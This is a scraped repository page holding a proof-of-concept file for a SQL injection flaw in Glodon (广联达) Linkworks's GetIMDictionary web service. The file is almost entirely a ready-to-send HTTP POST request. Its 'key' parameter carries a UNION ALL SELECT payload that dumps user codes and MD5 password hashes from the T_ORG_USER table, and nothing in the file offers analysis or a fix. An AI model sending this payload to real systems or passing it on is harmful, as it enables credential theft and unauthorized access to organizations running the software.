Projects STRLCPY 2023Hvv Files
🤬
main
ROOT /
广联达 Linkworks GetIMDictionarySQL 注入漏洞.md
11 lines | ISO-8859-1 | 222 bytes

POC:

POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1 
Host: 
Content-Type: application/x-www-form-urlencoded

key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --
Please wait...
Page is in error, reload to recover